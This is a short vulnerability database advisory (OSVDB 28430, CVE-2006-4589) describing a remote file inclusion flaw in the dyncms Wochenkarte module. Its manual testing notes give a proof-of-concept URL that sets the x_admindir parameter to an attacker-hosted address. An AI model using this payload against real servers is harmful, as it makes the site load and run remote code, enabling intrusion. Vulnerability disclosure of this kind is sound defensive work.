dyncms Wochenkarte/frontend/index.php x_admindir Variable Remote File Inclusion

2006-09-02T11:34:14
ID OSVDB:28430
Type osvdb
Reporter OSVDB
Modified 2006-09-02T11:34:14

Description

Manual Testing Notes

http://[target]/[path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://[attacker]?

References:

Vendor URL: http://www.dyncms.com/ Secunia Advisory ID:21729 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0053.html Generic Exploit URL: http://milw0rm.com/exploits/2290 CVE-2006-4589 Bugtraq ID: 19846